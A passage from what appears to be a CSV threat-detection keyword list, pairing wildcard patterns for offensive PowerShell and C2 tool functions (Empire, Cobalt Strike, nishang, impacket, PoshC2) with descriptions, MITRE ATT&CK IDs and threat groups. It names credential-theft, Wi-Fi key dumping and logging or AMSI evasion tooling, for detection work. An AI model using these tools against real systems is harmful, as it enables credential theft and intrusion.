Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-UserPrivileges*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-UserPRTToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. 
network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*GetUserSPNs.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*GetUserSPNs.vbs*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*Get-VaultCredential*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-VaultCredential*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-VaultCredential.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-VaultCreds*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-WebCredentials*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*GetWebDAVStatus.csproj*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*GetWebDAVStatus.sln*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*GetWebDAVStatus_DotNet*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*GetWebDAVStatus_x64.o*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*GetWhoamiCommand*","offensive_tool_keyword","C2 related tools","PowerShell 
rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*GetWhoamiCommand.cs*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*GetWindowsCredentials.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*Get-Wlan-Keys*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-WLAN-Keys*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-WLAN-Keys.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*getwmiregcachedrdpconnection*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Get-WMIRegCachedRDPConnection*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for 
Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Get-WMIRegCachedRDPConnection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-wmiregcachedrdpconnection*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*getwmireglastloggedon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Get-WMIRegLastLoggedOn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 
- T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Get-WMIRegLastLoggedOn*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-wmireglastloggedon*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-WMIRegMountedDrive*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - 